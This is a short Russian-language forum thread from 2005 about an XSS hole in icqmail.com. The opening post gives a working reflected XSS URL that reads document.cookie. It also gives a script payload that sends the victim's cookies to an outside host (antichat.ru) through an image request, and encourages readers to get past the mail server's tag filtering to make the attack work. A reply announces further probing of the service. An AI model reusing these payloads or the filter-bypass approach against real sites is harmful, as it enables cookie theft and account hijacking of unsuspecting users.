www.icqmail.com [XSS]

Discussion in 'Уязвимости' started by PSalm69, 23 Sep 2005.

  1. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    Для тех кто не знал:
    На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =)
    Code:
    http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script> 
    Довольно распространнённая XSS.
    Но, как ни странно есть НО. Посылается письмо на мыло [email protected] от наивного чукотского парня с примерно вот таким содержанием
    Code:
    <script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>
    пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён.
    Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт.
    Удачи в реале
     
    1 person likes this.
  2. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Неплохо....кстати Я щас и сам раскручиваю сервант асикю, думаю к концу недели предоставлю полный доклад, ибо баг уже найдено впоряде!!!

    З.Ы. Кто украдет мои идеи, получит по голове )))))))))))))